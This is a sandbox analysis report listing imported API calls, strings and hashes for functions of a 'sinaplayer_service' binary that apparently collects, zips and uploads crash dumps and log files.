                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,00000000), ref: 0037999F
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,00000000), ref: 003799C2
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 003799D3
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_N@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003799ED
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003799F5
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00379A13
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00379A22
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00379A6E
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00379A7C
                                                                                                                                                                                                    • ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP120(00000000,00000000,00000000), ref: 00379A90
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 00379AD1
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 00379ADD
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 00379AE9
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 00379B05
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00379B22
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00379B32
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
• Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$U?$char_traits@$Path@base@@$D@std@@@std@@$??3@$V01@$V12@$??6?$basic_ostream@U?$char_traits@_$V?$allocator@_V?$basic_string@_W@std@@$Append@StringV01@@$BaseBasicCountCreateD@2@@std@@@1@@D@std@@Name@Piece@TickV?$allocator@V?$basic_string@W@2@@std@@W@2@@std@@@W@base@@Wide@base@@Xlength_error@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@?pptr@?$basic_streambuf@?setg@?$basic_streambuf@CopyCurrentD00@D@std@@@1@@DebugDirectoryExtension@NativeOutputPath@1@Path@1@0@Path@1@@RemoveSize@base@@ThreadUnlock@?$basic_streambuf@UuidV01@_V12@@V?$basic_streambuf@W@std@@@std@@Xout_of_range@std@@_time64memcpy
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $.zip$CopyAndZip bret = $dmp_temp$upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 4082716852-2813645332
                                                                                                                                                                                                    • Opcode ID: a746d37a563961ecc5dbec98353826739fdb4d62a4e82ce89ebe82b3c3661dc6
                                                                                                                                                                                                    • Instruction ID: d19fa2d2f5518937ee7f699bb8aad956d7557424c3122bbb3fe9efaa48c406fc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a746d37a563961ecc5dbec98353826739fdb4d62a4e82ce89ebe82b3c3661dc6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5128871C00258EFDF22DBA4CC49BDEBBB8BF15304F144199E409A7291DB756A88CF62

                                                                                                                                                                                                    Control-flow Graph

[Control-flow graph of the function starting at 378ec0; nodes marked executed / not executed]
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0FileEnumerator@base@@QAE@ABVFilePath@1@_NHABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(0000003C,00000001,00000001,?,*.log*,00000006,8285FFAB,00000000,0000003C,00000000), ref: 00378F3C
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00378F4F
                                                                                                                                                                                                    • ?Next@FileEnumerator@base@@QAE?AVFilePath@2@XZ.BASE(?), ref: 00378F7B
                                                                                                                                                                                                    • ?empty@FilePath@base@@QBE_NXZ.BASE ref: 00378F83
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00378F9B
                                                                                                                                                                                                    • ?GetInfo@FileEnumerator@base@@QBE?AVFileInfo@12@XZ.BASE(?), ref: 00378FBD
                                                                                                                                                                                                    • ?GetName@FileInfo@FileEnumerator@base@@QBE?AVFilePath@3@XZ.BASE(?), ref: 00378FCD
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV12@@Z.BASE(?,00000000), ref: 00378FDF
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE(00000000), ref: 00378FFC
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00379005
                                                                                                                                                                                                    • ??1FileInfo@FileEnumerator@base@@QAE@XZ.BASE ref: 00379011
                                                                                                                                                                                                    • ?Next@FileEnumerator@base@@QAE?AVFilePath@2@XZ.BASE(?), ref: 00379021
                                                                                                                                                                                                    • ?empty@FilePath@base@@QBE_NXZ.BASE ref: 00379029
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037903B
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,acclog,00000006), ref: 00379086
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00379099
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
• Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$Enumerator@base@@$Info@$??3@?empty@Append@Next@Path@2@U?$char_traits@_V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@$Info@12@Name@Path@1@_Path@3@V12@@
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $*.log$*.log*$CollectLog vec_log_files_.size() = $acclog$upload_mgr.cpp

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 0037CC68
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037CC8E
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037CCC8
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037CD13
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037CD33
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037CD50
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0037CD73
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037CD84
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_N@Z.MSVCP120 ref: 0037CD9E
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_N@Z.MSVCP120 ref: 0037CDAF
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0037CDB7
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037CDD5
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037CDE4
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037CE35
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037CE41
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037CE4D
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 0037CEA5
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037CEB8
                                                                                                                                                                                                    • ?DeleteFileW@base@@YA_NABVFilePath@1@_N@Z.BASE(?,00000001), ref: 0037CEDA
                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 0037CEE4
                                                                                                                                                                                                    • ?BaseName@FilePath@base@@QBE?AV12@XZ.BASE(?), ref: 0037CEFB
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV12@@Z.BASE(?,00000000), ref: 0037CF0D
                                                                                                                                                                                                    • ?Move@base@@YA_NABVFilePath@1@0@Z.BASE(?,00000000), ref: 0037CF19
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037CF2E
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037CF3B
                                                                                                                                                                                                    • ?BaseName@FilePath@base@@QBE?AV12@XZ.BASE(?), ref: 0037CF4B
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV12@@Z.BASE(?,00000000), ref: 0037CF5D
                                                                                                                                                                                                    • ?CopyFileW@base@@YA_NABVFilePath@1@0@Z.BASE(?,00000000), ref: 0037CF69
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037CF7F
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037CF88
                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,0039DEB0,0039DEA4,00000004), ref: 0037CFB2
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037CFE9
                                                                                                                                                                                                    • ?DeleteFileW@base@@YA_NABVFilePath@1@_N@Z.BASE(?,00000000,?,?,?,?,?), ref: 0037D023
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120(?,?,?,?,?), ref: 0037D04E
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037D062
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037D073
                                                                                                                                                                                                    • memmove.MSVCR120(?,FFFFFFFF,?), ref: 0037D0E2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
• Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$File$Path@base@@$??6?$basic_ostream@V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@V01@V12@$?width@ios_base@std@@W@base@@$??3@Append@U?$char_traits@_$?sputc@?$basic_streambuf@BaseDeleteName@Path@1@0@Path@1@_V01@_V12@@W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CopyCountCreateCurrentD@std@@@1@@DebugDirectoryMessageMove@base@@Osfx@?$basic_ostream@OutputPath@1@@StringThreadTickUnlock@?$basic_streambuf@V01@@V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@memmove
                                                                                                                                                                                                    • String ID: need_retry = $)#sinaclient#[$)- $UploadMgr::TaskComplete upload_suc = $dmp_backup$open$upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 3136150174-2007185669
                                                                                                                                                                                                    • Opcode ID: 21a089594ce684e8a37bf9e9df4bf69a248dc7bb8607cf81fa173a94ff7ef40e
                                                                                                                                                                                                    • Instruction ID: 575f3497ce53e65ef79b5a53455438efd960ff0a7335d498c4af89c0bd1f7c92
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21a089594ce684e8a37bf9e9df4bf69a248dc7bb8607cf81fa173a94ff7ef40e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0E17C71900218DFDF22DFA4DD4ABDDBBB8BF15304F144199E809AB292DB356A48CF61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 0037EAFE
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037EB22
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037EB5C
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037EB96
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037EBB3
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037EBD0
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0037EBF3
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037EC04
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0037EC1E
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037EC42
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037EC4D
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037EC9E
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037ECAA
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037ECB3
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000002,00000032), ref: 0037ECC5
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037ECF3
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037ED17
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037ED51
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037ED8B
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037EDA8
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,00000000), ref: 0037EDC5
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,00000000), ref: 0037EDE8
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 0037EDF9
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037EE13
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037EE31
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037EE3C
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037EE8D
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037EE99
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037EEA5
                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000002,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037EEB0
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037EEBE
                                                                                                                                                                                                    • ?Alias@debug@base@@YAXPBX@Z.BASE(?), ref: 0037EED1
                                                                                                                                                                                                    • ?Alias@debug@base@@YAXPBX@Z.BASE(?), ref: 0037EED7
                                                                                                                                                                                                    • ?Alias@debug@base@@YAXPBX@Z.BASE(?), ref: 0037EEE3
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(upload_thread.cpp,00000049,00000004), ref: 0037EEF7
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE ref: 0037EF2D
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000002), ref: 0037EF36
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@$V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@$?width@ios_base@std@@$Alias@debug@base@@ThreadU?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??3@?sputc@?$basic_streambuf@CountCurrentD@std@@@1@@DebugMessage@logging@@OutputStringTickV01@@$?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CloseErrorHandleLastObjectOsfx@?$basic_ostream@SingleTerminateWait
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $Check failed: false. $UploadThread::Join$UploadThread::Join WAIT_TIMEOUT kill thread$upload_thread.cpp$Vll
                                                                                                                                                                                                    • API String ID: 2929787548-2334612836
                                                                                                                                                                                                    • Opcode ID: 3c9364741d876eaf3d1bbeb4ed626368a0827153fcf38c32b52aeaa6d03c5e42
                                                                                                                                                                                                    • Instruction ID: ae55b67e3a7eef3aa6a217cb05e027a5e8efa0e2382ce94c58ed9bbb7128ec97
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c9364741d876eaf3d1bbeb4ed626368a0827153fcf38c32b52aeaa6d03c5e42
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9FC161B5D00208ABCF22DFA4ED4ABDDBBB8FB08305F008595E50DA7291DB759A48CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB,?,?,?), ref: 0037B165
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000,?,?,?), ref: 0037B189
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(?,?,?), ref: 0037B1C3
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037B1FE
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037B224
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
